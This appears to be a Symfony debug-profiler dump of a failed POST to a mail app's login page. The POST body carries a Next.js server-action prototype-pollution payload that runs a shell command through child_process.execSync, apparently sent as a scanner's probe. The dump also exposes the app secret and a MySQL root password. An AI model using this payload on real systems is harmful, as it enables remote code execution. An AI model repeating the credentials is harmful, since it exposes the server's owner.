Redirect 302 redirect from GET @app_index (adb900)

Error 500 Internal Server Error

POST https://promail.7ap.tech/login?p=login

IP
18.231.254.234
Profiled on
Token
5aa0ae
Forwarded to ErrorController (c8420e)

Request / Response

Request

GET Parameters

Key Value
p 
"login"

POST Parameters

Key Value
0 
"{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}"
1 
""$@0""
2 
"[]"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_controller 
"App\Controller\SecurityController::login"
_firewall_context 
"security.firewall.map.context.main"
_redirected 
true
_remove_csp_headers 
true
_route 
"app_login"
_route_params 
[]
_security_firewall_run 
"_security_main"
_stopwatch_token 
"5f71af"

Request Headers

Header Value
accept 
"*/*"
accept-encoding 
"gzip, deflate"
connection 
"keep-alive"
content-length 
"753"
content-type 
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
cookie 
"PHPSESSID=nbd3pm4836q3r1s107hi0r2v9t; sf_redirect=%7B%22token%22%3A%22adb900%22%2C%22route%22%3A%22app_index%22%2C%22method%22%3A%22GET%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CIndexController%22%2C%22method%22%3A%22index%22%2C%22file%22%3A%22%5C%2Fvar%5C%2Fwww%5C%2Fpromail%5C%2Fsrc%5C%2FController%5C%2FIndexController.php%22%2C%22line%22%3A12%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
host 
"promail.7ap.tech"
next-action 
"x"
user-agent 
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0"
x-nextjs-html-request-id 
"SSTMXm7OJ_g0Ncx6jpQt9"
x-nextjs-request-id 
"b5dce965"
x-php-ob-level 
"1"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
cache-control 
"no-cache, private"
content-type 
"text/html; charset=UTF-8"
date 
"Mon, 22 Dec 2025 19:07:41 GMT"
vary 
"Accept"
x-debug-exception 
"Notice%3A%20SessionHandler%3A%3Agc%28%29%3A%20ps_files_cleanup_dir%3A%20opendir%28%2Fvar%2Flib%2Fphp%2Fsessions%29%20failed%3A%20Permission%20denied%20%2813%29"
x-debug-exception-file 
"%2Fvar%2Fwww%2Fpromail%2Fvendor%2Fsymfony%2Fhttp-foundation%2FSession%2FStorage%2FHandler%2FStrictSessionHandler.php:87"
x-debug-token 
"5aa0ae"
x-debug-token-link 
"https://promail.7ap.tech/_profiler/c8420e"
x-previous-debug-token 
"c8420e"
x-robots-tag 
"noindex"

Cookies

Request Cookies

Key Value
PHPSESSID 
"nbd3pm4836q3r1s107hi0r2v9t"
sf_redirect 
"{"token":"adb900","route":"app_index","method":"GET","controller":{"class":"App\\Controller\\IndexController","method":"index","file":"\/var\/www\/promail\/src\/Controller\/IndexController.php","line":12},"status_code":302,"status_text":"Found"}"

Response Cookies

No response cookies

Session

Session Metadata

Key Value
Created 
"Mon, 22 Dec 25 19:07:41 +0000"
Last used 
"Mon, 22 Dec 25 19:07:41 +0000"
Lifetime 
0

Session Attributes

Attribute Value
_security.main.target_path 
"https://promail.7ap.tech/"

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV 
"dev"
APP_SECRET 
"b2dae0773b3aa31905f488ba5c182b41"
DATABASE_URL 
"mysql://root:Amrani@@@021891@127.0.0.1:3306/promail?serverVersion=8.0.33-0ubuntu0.22.04.2&charset=utf8mb4"
MESSENGER_TRANSPORT_DSN 
"doctrine://default?auto_setup=0"

Defined as regular env variables

Key Value
APP_DEBUG 
"1"
CONTENT_LENGTH 
"753"
CONTENT_TYPE 
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
CONTEXT_DOCUMENT_ROOT 
"/var/www/promail/public"
CONTEXT_PREFIX 
""
DOCUMENT_ROOT 
"/var/www/promail/public"
GATEWAY_INTERFACE 
"CGI/1.1"
HTTPS 
"on"
HTTP_ACCEPT 
"*/*"
HTTP_ACCEPT_ENCODING 
"gzip, deflate"
HTTP_CONNECTION 
"keep-alive"
HTTP_COOKIE 
"PHPSESSID=nbd3pm4836q3r1s107hi0r2v9t; sf_redirect=%7B%22token%22%3A%22adb900%22%2C%22route%22%3A%22app_index%22%2C%22method%22%3A%22GET%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CIndexController%22%2C%22method%22%3A%22index%22%2C%22file%22%3A%22%5C%2Fvar%5C%2Fwww%5C%2Fpromail%5C%2Fsrc%5C%2FController%5C%2FIndexController.php%22%2C%22line%22%3A12%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
HTTP_HOST 
"promail.7ap.tech"
HTTP_NEXT_ACTION 
"x"
HTTP_USER_AGENT 
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0"
HTTP_X_NEXTJS_HTML_REQUEST_ID 
"SSTMXm7OJ_g0Ncx6jpQt9"
HTTP_X_NEXTJS_REQUEST_ID 
"b5dce965"
PATH 
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/snap/bin"
PHP_SELF 
"/index.php"
QUERY_STRING 
"p=login"
REDIRECT_HTTPS 
"on"
REDIRECT_QUERY_STRING 
"p=login"
REDIRECT_SSL_TLS_SNI 
"promail.7ap.tech"
REDIRECT_STATUS 
"200"
REDIRECT_URL 
"/login"
REMOTE_ADDR 
"18.231.254.234"
REMOTE_PORT 
"47784"
REQUEST_METHOD 
"POST"
REQUEST_SCHEME 
"https"
REQUEST_TIME 
1766430461
REQUEST_TIME_FLOAT 
1766430461.922
REQUEST_URI 
"/login"
SCRIPT_FILENAME 
"/var/www/promail/public/index.php"
SCRIPT_NAME 
"/index.php"
SERVER_ADDR 
"95.179.186.228"
SERVER_ADMIN 
"[no address given]"
SERVER_NAME 
"promail.7ap.tech"
SERVER_PORT 
"443"
SERVER_PROTOCOL 
"HTTP/1.1"
SERVER_SIGNATURE 
"<address>Apache/2.4.58 (Ubuntu) Server at promail.7ap.tech Port 443</address>\n"
SERVER_SOFTWARE 
"Apache/2.4.58 (Ubuntu)"
SSL_TLS_SNI 
"promail.7ap.tech"
SYMFONY_DOTENV_VARS 
"APP_ENV,APP_SECRET,DATABASE_URL,MESSENGER_TRANSPORT_DSN"

Sub Requests 1

ErrorController (token = c8420e)

Key Value
_controller 
"error_controller"
_stopwatch_token 
"c1cebe"
exception 
ErrorException {#148
  #message: "Notice: SessionHandler::gc(): ps_files_cleanup_dir: opendir(/var/lib/php/sessions) failed: Permission denied (13)"
  #code: 0
  #file: "/var/www/promail/vendor/symfony/http-foundation/Session/Storage/Handler/StrictSessionHandler.php"
  #line: 87
  #severity: E_NOTICE
  trace: {
    /var/www/promail/vendor/symfony/http-foundation/Session/Storage/Handler/StrictSessionHandler.php:87 {
      Symfony\Component\HttpFoundation\Session\Storage\Handler\StrictSessionHandler->gc(int $maxlifetime): int|false …
      › {    return $this->handler->gc($maxlifetime);}
    }
    /var/www/promail/vendor/symfony/http-foundation/Session/Storage/Proxy/SessionHandlerProxy.php:64 {
      Symfony\Component\HttpFoundation\Session\Storage\Proxy\SessionHandlerProxy->gc(int $maxlifetime): int|false …
      › {    return $this->handler->gc($maxlifetime);}
    }
    Symfony\Component\HttpFoundation\Session\Storage\Proxy\SessionHandlerProxy->gc() {}
    /var/www/promail/vendor/symfony/http-foundation/Session/Storage/NativeSessionStorage.php:172 {
      Symfony\Component\HttpFoundation\Session\Storage\NativeSessionStorage->start(): bool …
      › // ok to try and start the sessionif (!session_start()) {    throw new \RuntimeException('Failed to start the session.');
    }
    /var/www/promail/vendor/symfony/http-foundation/Session/Storage/NativeSessionStorage.php:311 {
      Symfony\Component\HttpFoundation\Session\Storage\NativeSessionStorage->getBag(string $name): SessionBagInterface …
      › } elseif (!$this->started) {    $this->start();}
    }
    /var/www/promail/vendor/symfony/http-foundation/Session/Session.php:222 {
      Symfony\Component\HttpFoundation\Session\Session->getBag(string $name): SessionBagInterface …
      › {    $bag = $this->storage->getBag($name);}
    /var/www/promail/vendor/symfony/http-foundation/Session/Session.php:242 {
      Symfony\Component\HttpFoundation\Session\Session->getAttributeBag(): AttributeBagInterface …
      › {    return $this->getBag($this->attributeName);}
    }
    /var/www/promail/vendor/symfony/http-foundation/Session/Session.php:69 {
      Symfony\Component\HttpFoundation\Session\Session->get(string $name, mixed $default = null): mixed …
      › {    return $this->getAttributeBag()->get($name, $default);}
    }
    /var/www/promail/vendor/symfony/security-http/Firewall/ContextListener.php:98 {
      Symfony\Component\Security\Http\Firewall\ContextListener->authenticate(RequestEvent $event): void …
      › $sessionId = $request->cookies->all()[$session->getName()] ?? null;$token = $session->get($this->sessionKey);}
    /var/www/promail/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php:46 {
      Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener->authenticate(RequestEvent $event): void …
      › try {    $this->listener->authenticate($event);} catch (LazyResponseException $e) {
    }
    /var/www/promail/vendor/symfony/security-http/Firewall/AbstractListener.php:26 {
      Symfony\Component\Security\Http\Firewall\AbstractListener->__invoke(RequestEvent $event) …
      › if (false !== $this->supports($event->getRequest())) {    $this->authenticate($event);}
    }
    /var/www/promail/vendor/symfony/security-bundle/Security/LazyFirewallContext.php:60 {
      Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext->__invoke(RequestEvent $event) …
      › foreach ($listeners as $listener) {    $listener($event);}
    /var/www/promail/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php:73 {
      Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener->callListeners(RequestEvent $event, iterable $listeners): void …
      › 
      ›     $listener($event);} else {
    }
    /var/www/promail/vendor/symfony/security-http/Firewall.php:95 {
      Symfony\Component\Security\Http\Firewall->onKernelRequest(RequestEvent $event) …
      › 
      ›     $this->callListeners($event, $authenticationListeners());}
    }
    /var/www/promail/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:116 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › try {    ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {
    }
    /var/www/promail/vendor/symfony/event-dispatcher/EventDispatcher.php:220 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
    }
    /var/www/promail/vendor/symfony/event-dispatcher/EventDispatcher.php:56 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
    }
    /var/www/promail/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:139 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
    }
    /var/www/promail/vendor/symfony/http-kernel/HttpKernel.php:142 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);}
    /var/www/promail/vendor/symfony/http-kernel/HttpKernel.php:74 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $this->handleRaw($request, $type);} catch (\Throwable $e) {
    }
    /var/www/promail/vendor/symfony/http-kernel/Kernel.php:197 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /var/www/promail/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 {
      Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int …
      › {    $response = $this->kernel->handle($this->request);    $response->send();
    }
    /var/www/promail/vendor/autoload_runtime.php:29 {
      require_once …
      ›         ->getRunner($app)        ->run());
    }
    /var/www/promail/public/index.php:5 {
      › 
      › require_once dirname(__DIR__).'/vendor/autoload_runtime.php';arguments: {
        "/var/www/promail/vendor/autoload_runtime.php"
      }
    }
  }
}
logger 
Symfony\Bridge\Monolog\Logger {#47 …9}